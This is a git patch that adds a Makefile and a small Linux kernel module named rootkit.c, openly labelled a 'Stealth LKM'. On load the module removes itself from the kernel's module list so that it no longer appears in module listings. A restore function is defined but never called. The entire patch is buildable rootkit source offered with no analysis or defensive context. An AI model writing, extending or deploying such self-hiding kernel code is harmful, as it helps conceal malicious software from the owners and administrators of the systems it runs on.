From 1b0cf3be13e2670b7756204668641613251abfd7 Mon Sep 17 00:00:00 2001
From: Vadim Belous <stylish_bear@icloud.com>
Date: Mon, 8 Jul 2024 22:15:11 +0400
Subject: [PATCH] upload source code

---
 Makefile  |  7 +++++++
 rootkit.c | 40 ++++++++++++++++++++++++++++++++++++++++
 2 files changed, 47 insertions(+)
 create mode 100644 Makefile
 create mode 100644 rootkit.c

diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..1856805
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,7 @@
+obj-m += rootkit.o
+
+all:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
+
+clean:
+	make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
diff --git a/rootkit.c b/rootkit.c
new file mode 100644
index 0000000..f56ae75
--- /dev/null
+++ b/rootkit.c
@@ -0,0 +1,40 @@
+#include <linux/init.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/syscalls.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Unauthenticated Papaya");
+MODULE_DESCRIPTION("Stealth LKM");
+MODULE_VERSION("0.01");
+
+static struct list_head *prev_module;
+static short hidden = 0;
+
+void showme(void)
+{
+    list_add(&THIS_MODULE->list, prev_module);
+    hidden = 0;
+}
+
+void hideme(void)
+{
+    prev_module = THIS_MODULE->list.prev;
+    list_del(&THIS_MODULE->list);
+    hidden = 1;
+}
+
+static int __init rootkit_init(void)
+{
+    printk(KERN_INFO "Rootkit Loaded\n");
+    hideme();
+    return 0;
+}
+
+static void __exit rootkit_exit(void)
+{
+    printk(KERN_INFO "Rootkit unloaded\n");
+}
+
+module_init(rootkit_init);
+module_exit(rootkit_exit);